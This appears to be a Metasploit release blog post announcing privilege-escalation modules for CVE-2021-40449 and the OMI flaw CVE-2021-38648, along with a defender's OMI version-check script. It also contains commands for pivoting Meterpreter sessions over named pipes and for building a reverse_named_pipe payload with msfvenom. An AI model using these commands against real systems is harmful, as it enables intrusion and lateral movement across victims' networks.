CVSS3: 9.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS2: 6.8 Medium (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Metasploit has now added an exploit module for CVE-2021-40449, a Windows local privilege escalation vulnerability caused by a use-after-free during the NtGdiResetDC callback in vulnerable versions of win32k.sys. This module can be used to escalate privileges to those of NT AUTHORITY\SYSTEM. The module should work against Windows 10 x64 builds 14393 and 17763, and it should also work against older versions of Windows 10. Note that this exploit may not always work on the first attempt and may require an additional run to succeed.
As a continuation of the recently landed OMIGOD RCE module, Spencer McIntyre has contributed a new local privilege escalation module for CVE-2021-38648, an authentication bypass in Microsoft's Open Management Infrastructure (OMI) management interface in versions earlier than 1.6.8-1. The vulnerability must be leveraged locally and is exploitable in the default configuration. Exploitation results in OS command execution as the root user.
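As an added example (not code from this post or from the Metasploit project), a small POSIX shell check a defender can run on a Linux host to see whether the installed OMI package is below the 1.6.8-1 fix version named above. It assumes the package is named omi, is installed via dpkg or rpm, and that GNU coreutils sort -V is available; the version strings in the comments are constructed samples.

```shell
#!/bin/sh
# Added example, not Rapid7/Metasploit code: report whether the locally
# installed OMI package is older than the fixed version 1.6.8-1 from the post.
# Assumptions: the package is named "omi" and was installed via dpkg or rpm.
FIXED_OMI_VERSION="1.6.8-1"

# Returns 0 (true) when $1 sorts strictly below the fixed version, 1 when it is
# at or above it, and 2 when no version was supplied. sort -V (GNU coreutils)
# is used so that a constructed "1.6.10-1" compares as newer than "1.6.8-1".
omi_version_vulnerable() {
    ver="$1"
    [ -n "$ver" ] || return 2
    [ "$ver" = "$FIXED_OMI_VERSION" ] && return 1
    lowest=$(printf '%s\n%s\n' "$ver" "$FIXED_OMI_VERSION" | sort -V | head -n 1)
    [ "$lowest" = "$ver" ]
}

# Best-effort lookup of the installed version; prints nothing if OMI is absent
# or the package manager is not one of the two handled here.
installed_omi_version() {
    if command -v dpkg-query >/dev/null 2>&1; then
        dpkg-query -W -f='${Version}' omi 2>/dev/null && return
    fi
    if command -v rpm >/dev/null 2>&1; then
        rpm -q --qf '%{VERSION}-%{RELEASE}' omi 2>/dev/null && return
    fi
    return 1
}

# Turn a version string (possibly empty) into a one-line finding.
omi_report() {
    ver="$1"
    if [ -z "$ver" ]; then
        echo "OMI not installed (or package name differs)"
        return 0
    fi
    if omi_version_vulnerable "$ver"; then
        echo "OMI $ver is below $FIXED_OMI_VERSION: CVE-2021-38648 applies, update OMI"
    else
        echo "OMI $ver is at or above $FIXED_OMI_VERSION"
    fi
}

omi_report "$(installed_omi_version)"
```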
This week dwelch-r7 fixed a regression issue in Meterpreter’s named pipe pivoting support. This relatively unknown feature was initially added by community contributor OJ and allows users to pivot additional Meterpreter sessions through a compromised host using named pipes over SMB.
As a quick demonstration, users can create a named pipe on a compromised Windows host through an existing Meterpreter session:
sessions -i -1
pivot add -t pipe -l $smb_host_ip -n mypipe -a x64 -p windows
Then verify the pivot was created successfully:
meterpreter > pivot list
Currently active pivot listeners
================================
Id URL Stage
-- --- -----
c134bb9f27dc4089b2f56b3ad25c4970 pipe://192.168.222.155/mypipe x64/windows
Now generate a new payload which will connect to the compromised host’s named pivot over SMB:
msfvenom -p windows/x64/meterpreter/reverse_named_pipe PIPEHOST=$smb_host_ip PIPENAME=mypipe -o pipe.exe -f exe -a x64
Execution of this new payload will attempt to connect to the compromised Windows host, resulting in a new session in msfconsole, which can be verified with the sessions command:
The new OMI module is a local exploit for versions earlier than 1.6.8-1 of Microsoft's Open Management Infrastructure (OMI) software. Issuing a command execution request against the local socket with the authentication handshake omitted can result in code execution as the root user.
The download command has been updated so that it now supports tab completion for file paths and file names.
#15818 from zeroSteiner - Fixes an edge case in the Kubernetes exec module which led to sessions dying when performing partial websocket reads
#15820 from dwelch-r7 - Fixes a regression issue in Meterpreter’s named pipe pivoting support
#15838 from uhei - Fixes a regression error in auxiliary/scanner/sap/sap_router_portscanner which caused this module to crash when validating host ranges
#15845 from smashery - This updates Meterpreter to check if it's running as SYSTEM before attempting to escalate as part of getsystem. This allows it to state that it's already running as SYSTEM instead of displaying an error message that no escalation technique worked.
As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).